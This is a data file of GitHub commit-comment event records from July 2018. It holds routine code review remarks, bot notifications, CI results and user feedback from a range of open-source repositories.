{"id":"7907843911","type":"CommitCommentEvent","actor":{"login":"vncoelho"},"repo":{"name":"neo-project/neo-cli"},"payload":{"comment":{"id":29569451,"position":286,"line":822,"path":"neo-cli/Shell/MainService.cs","commit_id":"eb85ccb2fe3e483715ef1c157657bd8a14ec9175","created_at":"2018-07-02T16:59:34Z","updated_at":"2018-07-02T16:59:34Z","author_association":"NONE","body":"Perhaps, delete `show node` command from console as well."}},"created_at":"2018-07-02T16:59:34Z"}
{"id":"7907844166","type":"CommitCommentEvent","actor":{"login":"jishan900"},"repo":{"name":"jishan900/Image-Processing"},"payload":{"comment":{"id":29569452,"position":null,"line":null,"path":null,"commit_id":"1b7df28dfe4c5c2a09bbc12372c9089f607f8efb","created_at":"2018-07-02T16:59:38Z","updated_at":"2018-07-02T16:59:38Z","author_association":"OWNER","body":"\r\n\r\n\r\n\r\n![dog](https://user-images.githubusercontent.com/32738421/42176678-9397e7de-7e4b-11e8-9663-f6216f2b1fa5.jpg)\r\n\r\n![output](https://user-images.githubusercontent.com/32738421/42176679-9411142e-7e4b-11e8-9690-3ec18bcdc5dd.jpg)\r\n"}},"created_at":"2018-07-02T16:59:38Z"}
{"id":"7907850716","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/py-ubjson-feedstock"},"payload":{"comment":{"id":29569464,"position":null,"line":null,"path":null,"commit_id":"b72cd7925cec54e9d6d1c9354fee213056692742","created_at":"2018-07-02T17:00:58Z","updated_at":"2018-07-02T17:00:58Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @timchurchard were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @timchurchard were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-02T17:00:58Z"}
{"id":"7907851042","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":29569465,"position":null,"line":null,"path":null,"commit_id":"c0d1b8e80861e75f7f3e76660675e88d963b81bb","created_at":"2018-07-02T17:01:03Z","updated_at":"2018-07-02T17:01:03Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n{\n  \"AnyOf\": \\[\n    {\n      \"AnyOf\": \\[\n        \"queue:create\\-task:highest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:very\\-high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:medium:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:very\\-low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:lowest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\"\n      \\]\n    },\n    {\n      \"AnyOf\": \\[\n        \"queue:create\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        {\n          \"AllOf\": \\[\n            \"queue:define\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n            \"queue:task\\-group\\-id:taskcluster\\-github/T6LHeqIXR1u2HURPjegqfQ\",\n            \"queue:schedule\\-task:taskcluster\\-github/T6LHeqIXR1u2HURPjegqfQ/T6LHeqIXR1u2HURPjegqfQ\"\n          \\]\n        }\n      \\]\n    }\n  \\]\n}\n\nYou have the scopes:\n\n```\n\\[\n  \"assume:project:taskcluster:mozilla\\-github\\-repository\",\n  \"assume:repo:github.com/servo/servo:pull\\-request\",\n  \"notify:email:\\*\",\n  \"notify:irc\\-channel:\\*\",\n  \"notify:irc\\-user:\\*\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/github\\-worker\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/github\\-worker\\-windows\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/servo\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/win2012r2\",\n  \"queue:route:garbage.\\*\",\n  \"queue:route:index.garbage.\\*\",\n  \"queue:route:notify.email.\\*\",\n  \"queue:route:notify.irc\\-channel.\\*\",\n  \"queue:route:notify.irc\\-user.\\*\",\n  \"queue:scheduler\\-id:taskcluster\\-github\",\n  \"secrets:get:garbage/\\*\",\n  \"secrets:set:garbage/\\*\"\n\\]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": \\[\n    {\n      \"AnyOf\": \\[\n        {\n          \"AllOf\": \\[\n            \"queue:scheduler\\-id:taskcluster\\-github\",\n            {\n              \"AnyOf\": \\[\n                \"queue:create\\-task:highest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:very\\-high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:medium:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:very\\-low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:lowest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\"\n              \\]\n            }\n          \\]\n        },\n        {\n          \"AnyOf\": \\[\n            \"queue:create\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n            {\n              \"AllOf\": \\[\n                \"queue:define\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:task\\-group\\-id:taskcluster\\-github/T6LHeqIXR1u2HURPjegqfQ\",\n                \"queue:schedule\\-task:taskcluster\\-github/T6LHeqIXR1u2HURPjegqfQ/T6LHeqIXR1u2HURPjegqfQ\"\n              \\]\n            }\n          \\]\n        }\n      \\]\n    }\n  \\]\n}\n```\n----\nmethod:     createTask\nerrorCode:  InsufficientScopes\nstatusCode: 403\ntime:       2018-07-02T17:01:02.930Z\n\n</details>"}},"created_at":"2018-07-02T17:01:03Z"}
{"id":"7907854030","type":"CommitCommentEvent","actor":{"login":"tanzhenyu"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":29569474,"position":null,"line":null,"path":null,"commit_id":"a7b7aa856f34bf2e44fbeb91d817742c61483618","created_at":"2018-07-02T17:01:41Z","updated_at":"2018-07-02T17:01:41Z","author_association":"CONTRIBUTOR","body":"NICE!"}},"created_at":"2018-07-02T17:01:41Z"}
{"id":"7907855227","type":"CommitCommentEvent","actor":{"login":"rajeevs12"},"repo":{"name":"rajeevs12/Payslipgenerator"},"payload":{"comment":{"id":29569482,"position":null,"line":null,"path":null,"commit_id":"df1c2fe1e21d5e3613d9011cad9ebe59e200f074","created_at":"2018-07-02T17:01:56Z","updated_at":"2018-07-02T17:01:56Z","author_association":"OWNER","body":"This project is used to generate payslips based on given input.This project have api to fetch payslips, asp.net web api is used to creating the api.\r\n**Usage example**\r\nNeed to run api project first and do below http post request\r\nAPI URL:http://localhost:5916/api/GenPaySlip/GenPaySlip .\r\n**Request Sample :**{\"First_name\":\"rajeev\",\"Last_name\":\"Sharma\",\"Annual_salary\":\"600000\",\"Super_rate\":\"5\",\"Payment_start_date\":\"01-March to 31-March\"}.\r\nApi will generate payslip in the response. \r\nThis is project is created using layered architecture.\r\nTo test this project i have created also a unit test project.\r\n\r\n"}},"created_at":"2018-07-02T17:01:56Z"}
{"id":"7907857999","type":"CommitCommentEvent","actor":{"login":"aardappel"},"repo":{"name":"google/flatbuffers"},"payload":{"comment":{"id":29569491,"position":null,"line":null,"path":null,"commit_id":"a2fe49b498955bc70c0cafc037a2ccd8b1b843d0","created_at":"2018-07-02T17:02:32Z","updated_at":"2018-07-02T17:02:32Z","author_association":"COLLABORATOR","body":"doc comments are only added to the header if they're in front of something that generates documentation (like a table, enum, or field). If you have the doc comment in front of e.g. `namespace` it is not going to do anything."}},"created_at":"2018-07-02T17:02:32Z"}
{"id":"7907858648","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/py-lz4framed-feedstock"},"payload":{"comment":{"id":29569492,"position":null,"line":null,"path":null,"commit_id":"d4f764e29ee4ba7bdc1e4932f8360913f8660885","created_at":"2018-07-02T17:02:40Z","updated_at":"2018-07-02T17:02:40Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @timchurchard were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @timchurchard were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-02T17:02:40Z"}
{"id":"7907860926","type":"CommitCommentEvent","actor":{"login":"freefolling"},"repo":{"name":"Geograph-us/Cloud-Mail.Ru-Downloader"},"payload":{"comment":{"id":29569495,"position":null,"line":null,"path":null,"commit_id":"7ab4165cc8eb730aa23f9fce80af39dd73a70033","created_at":"2018-07-02T17:03:10Z","updated_at":"2018-07-02T17:03:10Z","author_association":"NONE","body":"Очень выручили. Заработало. Спасибо."}},"created_at":"2018-07-02T17:03:10Z"}
{"id":"7907870869","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29569512,"position":null,"line":null,"path":null,"commit_id":"57d18d847e8c6fca974107dfc6e2da7d2528a3b2","created_at":"2018-07-02T17:05:14Z","updated_at":"2018-07-02T17:05:14Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - i386-Windows-7-VisualStudio-14: OK (2925 of 2925 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57d18d847e8c6fca974107dfc6e2da7d2528a3b2-PR6728-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57d18d847e8c6fca974107dfc6e2da7d2528a3b2-PR6728-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-02T17:05:14Z"}
{"id":"7907873925","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29569520,"position":null,"line":null,"path":null,"commit_id":"a78a67b3e2fa884a9859d64f4e639b7d616e3d4a","created_at":"2018-07-02T17:05:58Z","updated_at":"2018-07-02T17:05:58Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-child](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-child).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-child-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-02T17:05:58Z"}
{"id":"7907876457","type":"CommitCommentEvent","actor":{"login":"isonil"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29569528,"position":null,"line":null,"path":null,"commit_id":"5d6682c9ae228678b83a9f05f3af8c59ace13286","created_at":"2018-07-02T17:06:33Z","updated_at":"2018-07-02T17:06:33Z","author_association":"CONTRIBUTOR","body":"@mora145 You don't have to change the regular expressions. The addclosetag is just so the third expression can use it to find the correct location. Just copy paste them."}},"created_at":"2018-07-02T17:06:33Z"}
{"id":"7907876894","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29569530,"position":null,"line":null,"path":null,"commit_id":"a9f194398af68ab8b5cd15b423c4bf77ae661adb","created_at":"2018-07-02T17:06:39Z","updated_at":"2018-07-02T17:06:39Z","author_association":"MEMBER","body":"This is exactly what shouldn't be done with this kind of thing.  It creates magic dependencies between devices and the system they're in.  If you're having to use `:` or `^` to find something, you probably don't have a well-defined interface and need to rethink things."}},"created_at":"2018-07-02T17:06:39Z"}
{"id":"7907877959","type":"CommitCommentEvent","actor":{"login":"harshavardhana"},"repo":{"name":"minio/minio"},"payload":{"comment":{"id":29569534,"position":29,"line":295,"path":"cmd/encryption-v1.go","commit_id":"51b079a7b77ef1b3d94c954aebc0483f004ddcab","created_at":"2018-07-02T17:06:54Z","updated_at":"2018-07-02T17:06:54Z","author_association":"MEMBER","body":"Why would you need a critical and return ?"}},"created_at":"2018-07-02T17:06:54Z"}
{"id":"7907878357","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29569535,"position":null,"line":null,"path":null,"commit_id":"280e1c5536b2dce33558cd019d32bc9cefca05a6","created_at":"2018-07-02T17:06:59Z","updated_at":"2018-07-02T17:06:59Z","author_association":"OWNER","body":"sometimes configure scripts are wrong though (saying there's an upper level requirements on something when in reality it works fine).  It would be good to understand what the real requirements are.  In your support, freebsd does have two versions of the library but as you know I don't trust any decisions made by random maintainers (for no other reason than not knowing the background of those decisions and if the facts at the time are still true today).\r\n\r\nIt's just astonishingly bad form to drop backwards compatibility though.  It happens, but it's usually a sign that the authors don't really know what they're doing (e.g. stay away)."}},"created_at":"2018-07-02T17:06:59Z"}
{"id":"7907879484","type":"CommitCommentEvent","actor":{"login":"andremsouza"},"repo":{"name":"c-neves/SanConnect"},"payload":{"comment":{"id":29569537,"position":null,"line":null,"path":null,"commit_id":"c3e0c2a5567fcdb95030d61c0e5c3acf8c7d5622","created_at":"2018-07-02T17:07:15Z","updated_at":"2018-07-02T17:07:15Z","author_association":"COLLABORATOR","body":"Mensagem de commit errônea: \"createParticipa\""}},"created_at":"2018-07-02T17:07:15Z"}
{"id":"7907880170","type":"CommitCommentEvent","actor":{"login":"JanereQ"},"repo":{"name":"jmt06g/groupProject1"},"payload":{"comment":{"id":29569539,"position":null,"line":null,"path":null,"commit_id":"929738f4b49ba1568c9964d9710f881a050e2dad","created_at":"2018-07-02T17:07:24Z","updated_at":"2018-07-02T17:07:24Z","author_association":"COLLABORATOR","body":"1"}},"created_at":"2018-07-02T17:07:24Z"}
{"id":"7907881326","type":"CommitCommentEvent","actor":{"login":"andremsouza"},"repo":{"name":"c-neves/SanConnect"},"payload":{"comment":{"id":29569542,"position":null,"line":null,"path":null,"commit_id":"a25b0427f7158d7c392b64afb7cdc90b9e3b2e09","created_at":"2018-07-02T17:07:41Z","updated_at":"2018-07-02T17:07:41Z","author_association":"COLLABORATOR","body":"Mensagem de commit errônea: \"createParticipa\""}},"created_at":"2018-07-02T17:07:41Z"}
{"id":"7907885566","type":"CommitCommentEvent","actor":{"login":"ibnesayeed"},"repo":{"name":"oduwsdl/wsdlthesis"},"payload":{"comment":{"id":29569562,"position":null,"line":null,"path":null,"commit_id":"fc338fac31dd414d6e8df284fc6664d5313df9b4","created_at":"2018-07-02T17:08:39Z","updated_at":"2018-07-02T17:08:39Z","author_association":"MEMBER","body":"It's a closing curly brace, not a parenthesis."}},"created_at":"2018-07-02T17:08:39Z"}
{"id":"7907889620","type":"CommitCommentEvent","actor":{"login":"mikehardy"},"repo":{"name":"ACRA/acra"},"payload":{"comment":{"id":29569569,"position":null,"line":null,"path":null,"commit_id":"05e9a5384a981f905913b524f323108838154fe7","created_at":"2018-07-02T17:09:33Z","updated_at":"2018-07-02T17:09:33Z","author_association":"NONE","body":"I do have some thoughts since it is all very fresh in my mind...they're all small I think\r\n\r\nI think in the custom Dialog where you extend the provided base object the API move from using create in the subclass to init was in the javadoc but not the migration guide, so my experience was to discover a bug (exception \"already attached\") during testing, then discover the javadoc on the superclass method init(), then fix. I was doing test-driven development so this wasn't the worst for me but not all people develop with tests that way and it could lead to surprises. That's a possible migration issue. Also the need for \":acra\" in the Manifest was after the switch from 4.6 to >=4.7 with the worker thread and it wasn't noted in Migration but was in BasicSetup\r\n\r\nIf people are going to Oreo and using Notifications they need to know to assign a channel to that interaction method (we aren't, but I noted that)\r\n\r\nIf people have dev settings on the device for no activity saving and no background services, the Toast notification lingers until the app is killed post-send, as the hide toast message from the looper can't be sent because of a dead object exception. Those device settings are kind of ridiculous but they are also how we triggered the crash in our app via an underlying bug, and it was unexpected behavior from ACRA\r\n\r\nOther than that, I was a little unsure when I got the main CoreConfigurationBuilder, then chained more than one plugin ConfigurationBuilders off of it that when I did an .init at the end it would all come together. Again, with test-driven development I was able to prove to myself the configuration was working so I had confidence in reality :-), but in theory it would be cool to have a programmatic configuration example that showed something like the AnkiDroid combo usage of Dialog (for comments and user-configuration) + Toast (to tell the user a dialog is coming...) in runtime configuration. I think that's just one more line in the example runtime config block in BasicSetup wiki page\r\n\r\nACRA.init complains if you initialize it more than once but it isn't noted anywhere that is illegal. What if you want to change the configuration post-init? Is that possible?\r\n\r\nOn the testing side, it seemed hard to test for me. ACRA.init can only be called once making configuration testing a bit tricky. And I would love to have the ability to programmatically trigger ACRA *as if* the app crashed, and have a TestSender I could easily register that would get the whole report all wrapped up in a way that was ready to inspect/assert on. Something like ACRATest @@RunWith(AndroidJunit4.class), a @Test method, and in there I could do an inner class that extended an ACRA TestSender object which would have a hook to wait for reports, then I could ACRA.doCrashSimulation() or something and ACRA would do it's whole Interaction / report-generation thing but do the callback to my test and send me a ACRAReportJSONWrapper or something? I'm designing a feature most probably won't use, on the fly, in a text box on the web, that I won't implement so ignore the idea all you like :-). Maybe a sample-app with that test, and a drop-down that hooked \"ACRA.doCrashSimulation()\" to show everyone how to get it right\r\n\r\nTotally separately, I was unable to get acra-storage / acralyzer couchdb replication to work in Cloudant using the easy method described in the documentation and had to use the manual method. Not sure why - I had never used couchdb, or cloudant, or a couchapp before so possible a completely trivial mistake, but the manual instructions worked fine, so that was okay too. Not any ACRA-related problem but the documents were so excellent looking and yet didn't work?\r\n\r\nAll in all for a big API change upgrade, it was a good experience but you seem sincerely curious so I gave you everything for feedback :-). Thanks for a great project in ACRA and acralyzer, they are very useful for us."}},"created_at":"2018-07-02T17:09:33Z"}
{"id":"7907893327","type":"CommitCommentEvent","actor":{"login":"Nathan813"},"repo":{"name":"golang/go"},"payload":{"comment":{"id":29569578,"position":1,"line":343,"path":"src/html/template/js_test.go","commit_id":"5a3eea3dd22b0a194591ce2294b88cb340df1e8d","created_at":"2018-07-02T17:10:21Z","updated_at":"2018-07-02T17:10:21Z","author_association":"NONE","body":"394"}},"created_at":"2018-07-02T17:10:21Z"}
{"id":"7907895704","type":"CommitCommentEvent","actor":{"login":"AgnumCode"},"repo":{"name":"1806-jun25-net/training-code"},"payload":{"comment":{"id":29569585,"position":null,"line":null,"path":null,"commit_id":"35d653a3fc6b5b40d5a268d184521963a62126c9","created_at":"2018-07-02T17:10:53Z","updated_at":"2018-07-02T17:10:53Z","author_association":"NONE","body":"folder*"}},"created_at":"2018-07-02T17:10:53Z"}
{"id":"7907895815","type":"CommitCommentEvent","actor":{"login":"andremsouza"},"repo":{"name":"c-neves/SanConnect"},"payload":{"comment":{"id":29569586,"position":null,"line":null,"path":null,"commit_id":"24f808cd8423fbbcf673b1e62b09e5dac4884d7e","created_at":"2018-07-02T17:10:54Z","updated_at":"2018-07-02T17:10:54Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar schema GraphQL](https://trello.com/c/B5xkigxv/100-criar-schema-graphql)"}},"created_at":"2018-07-02T17:10:54Z"}
{"id":"7907896500","type":"CommitCommentEvent","actor":{"login":"andremsouza"},"repo":{"name":"c-neves/SanConnect"},"payload":{"comment":{"id":29569587,"position":null,"line":null,"path":null,"commit_id":"c3e0c2a5567fcdb95030d61c0e5c3acf8c7d5622","created_at":"2018-07-02T17:11:04Z","updated_at":"2018-07-02T17:11:04Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar schema GraphQL](https://trello.com/c/B5xkigxv/100-criar-schema-graphql)"}},"created_at":"2018-07-02T17:11:04Z"}
{"id":"7907896795","type":"CommitCommentEvent","actor":{"login":"mrJean1"},"repo":{"name":"mrJean1/PyGeodesy"},"payload":{"comment":{"id":29569588,"position":null,"line":null,"path":null,"commit_id":"61cea5ec0675b4caa54714cfeecb0c425fdcecff","created_at":"2018-07-02T17:11:09Z","updated_at":"2018-07-02T17:11:09Z","author_association":"OWNER","body":"All these “—ignore” and other ones are handled by pychok the post processor."}},"created_at":"2018-07-02T17:11:09Z"}
{"id":"7907897137","type":"CommitCommentEvent","actor":{"login":"andremsouza"},"repo":{"name":"c-neves/SanConnect"},"payload":{"comment":{"id":29569589,"position":null,"line":null,"path":null,"commit_id":"a25b0427f7158d7c392b64afb7cdc90b9e3b2e09","created_at":"2018-07-02T17:11:12Z","updated_at":"2018-07-02T17:11:12Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar schema GraphQL](https://trello.com/c/B5xkigxv/100-criar-schema-graphql)"}},"created_at":"2018-07-02T17:11:12Z"}
{"id":"7907897968","type":"CommitCommentEvent","actor":{"login":"MarkxOBrian"},"repo":{"name":"MarkxOBrian/ALC-Meetup"},"payload":{"comment":{"id":29569590,"position":null,"line":null,"path":null,"commit_id":"abc08dd31199e26063935e533f969ae1f5ebeb84","created_at":"2018-07-02T17:11:23Z","updated_at":"2018-07-02T17:11:23Z","author_association":"OWNER","body":"File removed because of some API KEYS"}},"created_at":"2018-07-02T17:11:23Z"}
{"id":"7907898067","type":"CommitCommentEvent","actor":{"login":"Staars"},"repo":{"name":"Staars/build"},"payload":{"comment":{"id":29569591,"position":null,"line":null,"path":null,"commit_id":"332ebdd67ee7cfd6264a3a52ba591e43fc1ed62d","created_at":"2018-07-02T17:11:24Z","updated_at":"2018-07-02T17:11:24Z","author_association":"OWNER","body":"Okay, I did a few tests. \nI don’t have a final solution, but at least I could reactivate the external SD-Card when I used ayufans repo in version 0.6.57. Of course I got the patch errors in the build process and I can not tell, if other things are broken. The quick look at dmesg was okay.\n\nSo a solution seems to be in reach. I will investigate further.\n\nBTW, can you enable \"Three-wire UART (H5) protocol support„ in the kernel config? I think, we need this for the rtl8822bs (but unfortunately this will not be enough).\n\n> Am 02.07.2018 um 14:02 schrieb Igor Pečovnik <notifications@github.com>:\n> \n> but after system start up it is lost.\n> \n> Huh. Is correct DTB loaded? Wireless and network is working, right?\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n\n"}},"created_at":"2018-07-02T17:11:24Z"}
{"id":"7907898324","type":"CommitCommentEvent","actor":{"login":"andremsouza"},"repo":{"name":"c-neves/SanConnect"},"payload":{"comment":{"id":29569592,"position":null,"line":null,"path":null,"commit_id":"11fe121b2af29645b1de1a0113dba0c30dac6c8e","created_at":"2018-07-02T17:11:28Z","updated_at":"2018-07-02T17:11:28Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar schema GraphQL](https://trello.com/c/B5xkigxv/100-criar-schema-graphql)"}},"created_at":"2018-07-02T17:11:28Z"}
{"id":"7907899493","type":"CommitCommentEvent","actor":{"login":"andremsouza"},"repo":{"name":"c-neves/SanConnect"},"payload":{"comment":{"id":29569596,"position":null,"line":null,"path":null,"commit_id":"9feed7c449c36d1e48869b83d11e68f1350004aa","created_at":"2018-07-02T17:11:43Z","updated_at":"2018-07-02T17:11:43Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar schema GraphQL](https://trello.com/c/B5xkigxv/100-criar-schema-graphql)"}},"created_at":"2018-07-02T17:11:43Z"}
{"id":"7907900392","type":"CommitCommentEvent","actor":{"login":"ronf"},"repo":{"name":"ronf/asyncssh"},"payload":{"comment":{"id":29569600,"position":4,"line":211,"path":"tests/server.py","commit_id":"6a92930e00f3bbc67d9cdf66816917e64f2450e9","created_at":"2018-07-02T17:11:54Z","updated_at":"2018-07-02T17:11:54Z","author_association":"OWNER","body":"Terrific - thanks for the quick confirmation! I'll try to get a patch release out by the weekend."}},"created_at":"2018-07-02T17:11:54Z"}
{"id":"7907912351","type":"CommitCommentEvent","actor":{"login":"aldoborrero"},"repo":{"name":"enKryptIO/ethvm-socket-server"},"payload":{"comment":{"id":29569625,"position":35,"line":94,"path":"src/server/ethvm-server.ts","commit_id":"26d33d496518418e86c0e8c409211e13fe365105","created_at":"2018-07-02T17:14:35Z","updated_at":"2018-07-02T17:14:35Z","author_association":"CONTRIBUTOR","body":"@niktrix could you remove excesive blank lines? In the whole source file?"}},"created_at":"2018-07-02T17:14:35Z"}
{"id":"7907913105","type":"CommitCommentEvent","actor":{"login":"aldoborrero"},"repo":{"name":"enKryptIO/ethvm-socket-server"},"payload":{"comment":{"id":29569627,"position":38,"line":97,"path":"src/server/ethvm-server.ts","commit_id":"26d33d496518418e86c0e8c409211e13fe365105","created_at":"2018-07-02T17:14:46Z","updated_at":"2018-07-02T17:14:46Z","author_association":"CONTRIBUTOR","body":"And here"}},"created_at":"2018-07-02T17:14:46Z"}
{"id":"7907914177","type":"CommitCommentEvent","actor":{"login":"aldoborrero"},"repo":{"name":"enKryptIO/ethvm-socket-server"},"payload":{"comment":{"id":29569632,"position":9,"line":23,"path":"src/server/ethvm-server.ts","commit_id":"26d33d496518418e86c0e8c409211e13fe365105","created_at":"2018-07-02T17:15:00Z","updated_at":"2018-07-02T17:15:00Z","author_association":"CONTRIBUTOR","body":"Remove excesive blank lines @niktrix "}},"created_at":"2018-07-02T17:15:00Z"}
{"id":"7907914235","type":"CommitCommentEvent","actor":{"login":"jbduncan"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29569631,"position":null,"line":null,"path":null,"commit_id":"4c9a0c82d308d5df5c524e2a26644022ff525f3e","created_at":"2018-07-02T17:15:00Z","updated_at":"2018-07-02T17:15:00Z","author_association":"CONTRIBUTOR","body":"👍"}},"created_at":"2018-07-02T17:15:00Z"}
{"id":"7907915949","type":"CommitCommentEvent","actor":{"login":"aead"},"repo":{"name":"minio/minio"},"payload":{"comment":{"id":29569637,"position":29,"line":295,"path":"cmd/encryption-v1.go","commit_id":"51b079a7b77ef1b3d94c954aebc0483f004ddcab","created_at":"2018-07-02T17:15:25Z","updated_at":"2018-07-02T17:15:25Z","author_association":"COLLABORATOR","body":"It is not needed since CriticalIf panics - but in case of a bug (in e.g. CriticalIf) the code would create insecure or non-decryptable objects (data loss). Using a return here causes key rotation to fail even in case of a non-panic'ing / exiting CriticalIf. Basically defensive code..."}},"created_at":"2018-07-02T17:15:25Z"}
{"id":"7907917183","type":"CommitCommentEvent","actor":{"login":"aldoborrero"},"repo":{"name":"enKryptIO/ethvm-socket-server"},"payload":{"comment":{"id":29569640,"position":25,"line":42,"path":"src/server/ethvm-server.ts","commit_id":"26d33d496518418e86c0e8c409211e13fe365105","created_at":"2018-07-02T17:15:42Z","updated_at":"2018-07-02T17:15:42Z","author_association":"CONTRIBUTOR","body":"Remove this blank line"}},"created_at":"2018-07-02T17:15:42Z"}
{"id":"7907917926","type":"CommitCommentEvent","actor":{"login":"iwanttbepowerful"},"repo":{"name":"iwanttbepowerful/test"},"payload":{"comment":{"id":29569641,"position":null,"line":null,"path":null,"commit_id":"fe0b3b6c44ff12e3916adb423eaaa3d32436fa11","created_at":"2018-07-02T17:15:52Z","updated_at":"2018-07-02T17:15:52Z","author_association":"OWNER","body":"失之毫厘 差以千里"}},"created_at":"2018-07-02T17:15:52Z"}
{"id":"7907918527","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29569642,"position":null,"line":null,"path":null,"commit_id":"044582f24fb97f37c5a07eda747e6c538a62e8c1","created_at":"2018-07-02T17:16:01Z","updated_at":"2018-07-02T17:16:01Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#pr-6](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#pr-6).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-6-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-02T17:16:01Z"}
{"id":"7907919313","type":"CommitCommentEvent","actor":{"login":"Encamy"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29569643,"position":null,"line":null,"path":null,"commit_id":"4415d1b6fc79420678ae6baed49840cc33c4ca60","created_at":"2018-07-02T17:16:12Z","updated_at":"2018-07-02T17:16:12Z","author_association":"NONE","body":"As for me, with this patch I got less experience than with the previous one\r\n![image](https://user-images.githubusercontent.com/10367317/42177229-acd5a874-7e34-11e8-8d54-6bef978c8b10.png)\r\n"}},"created_at":"2018-07-02T17:16:12Z"}
